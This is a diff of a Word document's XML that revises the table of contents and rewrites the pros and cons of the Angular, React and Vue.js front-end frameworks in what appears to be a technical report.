+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>18</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:val="nl-NL" w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc116304456" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>MariaDB</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc116304456 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>18</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:val="nl-NL" w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc116304457" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>MySQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc116304457 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>18</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:val="nl-NL" w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc116304458" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Key Difference between MariaDB and MySQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc116304458 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>18</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:val="nl-NL" w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc116304459" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Conclusion</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc116304459 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2817,7 +3237,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc114487648"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc116304423"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Micro services</w:t>
@@ -2976,7 +3396,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc114487649"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc116304424"/>
       <w:r>
         <w:t>Front-end f</w:t>
       </w:r>
@@ -3161,7 +3581,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc114487650"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc116304425"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Angular</w:t>
@@ -3170,507 +3590,372 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Angular is a TypeScript-based JavaScript framework developed by Google.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> It is being called at times a Platform rather than a framework. However, the unmatched features of React have surpassed Angular.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> With a wide choice of in-build features, Angular allows you to build, manage and test your app much more efficiently. In addition, it is a widely popular framework for front-end development, therefore giant organizations such as Google, Forbes, WhatsApp and other 500 companies have shown interest in this framework.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pros of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sing Angular</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ensuring excellent app performance;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Providing offline support and PWA capabilities for the app development;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ideal option for creating large scale applications as it provides in-build features;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Projects developed with Angular are expandable, scalable, and developed more quickly;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>It embraces the Angular-CLI command-line tool;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Angular provides a basic framework for developing web apps and managing it without any support of other libraries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ensure end-to-end testing.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Downsides of using Angular</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Angular is the platform’s limited SEO options and poor accessibility for search engine crawlers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>With such a complex web of modules, coding languages, integrations and customizing capabilities, Angular is quite difficult to learn.</w:t>
-      </w:r>
-    </w:p>
+        <w:t xml:space="preserve">Angular is a TypeScript-based JavaScript framework developed by Google. Sometimes called a platform instead of a framework. But </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>React's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> unparalleled capabilities surpass </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Angular's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. With a variety of built-in features, Angular helps you build, manage, and test your apps more efficiently. Moreover, since it is a widely used framework for front-end development, huge organizations such as Google, Forbes, WhatsApp, and 500 other companies have shown interest in this framework. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Advantages of using Angular</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ensure good app performance.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Offers offline support and PWA functionality for app development.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>An ideal option for building rich applications because built-in functions are provided.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Projects developed in Angular are extensible, scalable, and develop faster.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Includes Angular-CLI, a command line tool.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Angular provides a basic framework for developing and managing web apps without the support of other libraries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Guarantee end-to-end testing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Disadvantages of using Angular</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Angular has limited platform SEO capabilities and poor accessibility for search engine crawlers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Angular is very difficult to learn due to its complex web of modules, programming languages, integrations, and customization options.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-    </w:p>
+      <w:bookmarkStart w:id="3" w:name="_Toc116304426"/>
+      <w:r>
+        <w:t>ReactJS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>React was started as a JavaScript library by Facebook. Over the last few years, React has grown a lot using the virtual DOM. This makes it easier to compare differences in previous HTML code and load only the parts that differ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Advantages of using React</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Faster loading.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>React lets you separate data and presentation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It's based on JavaScript, so it's easy at first.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>One file contains both markup and logic (JSX).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Disadvantages of using React</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>This is just a JavaScript library, not a complete framework.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Implementing an MVC architecture is not possible with React.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Inadequate for building web apps without support from other libraries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc114487651"/>
-      <w:r>
-        <w:t>ReactJS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>React is launched as a JavaScript library by Facebook.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Over the last few years, React is vastly growing as it uses a Virtual DOM that makes it easier to compare previous HTML code differences and only loads the different parts.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pros of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sing React</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ensuring faster loading;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>The separation of data and presentation is possible with React;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Being based on JavaScript, it is </w:t>
-      </w:r>
-      <w:r>
-        <w:t>more simple</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to begin</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Single file contains both markup and logic (JSX).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Downsides of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sing React</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>It is just a JavaScript library, not a complete framework;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Implementing MVC architecture is not possible with React;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Insufficient to build web app without the support of other libraries;</w:t>
+      <w:bookmarkStart w:id="4" w:name="_Toc116304427"/>
+      <w:r>
+        <w:t>Vue.js</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Vue is a community-driven, open-source framework and a rapidly growing JavaScript framework. It is the most talked about and fastest growing JavaScript-based framework started by former Google employee Evan You. A framework that sits between React and Angular. Developing user interfaces by combining reusable components is also important in Vue. But more than that, Vue offers more React and less Angular. That's why it's better than Angular.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Advantages of using Vue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="38"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Vue has extensive documentation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="42"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Reusable components of this framework make the development process much faster and easier.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>There is a possibility of Component-based Architecture (CBA).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It provides flexibility and simplicity for app development.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Vue provides a list of tools and libraries such as official CLI, Development tools, Vue Router, State Management, and more.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Disadvantages </w:t>
+      </w:r>
+      <w:r>
+        <w:t>of using Vue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Community support is not as wide as Angular and React</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Limited number of plugin availability</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc114487652"/>
-      <w:r>
-        <w:t>Vue.js</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Vue is a community-driven open-source framework and a rapidly growing JavaScript Framework.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> It is a most-discussed and rapidly growing JavaScript-based framework that is initiated by Google’s Ex-employee Evan You. It is a framework that sits somewhere between React and Angular.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Vue is also all </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>about developing User Interfaces by combining reusable components. But beyond that, Vue gives you more of React and less of Angular which is why it is surpassing Angular.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pros of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sing Vue</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Vue comes up with in-detail documentation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Reusable components of this framework make the development process much faster and easier.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>There is a possibility of Component-based Architecture (CBA).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
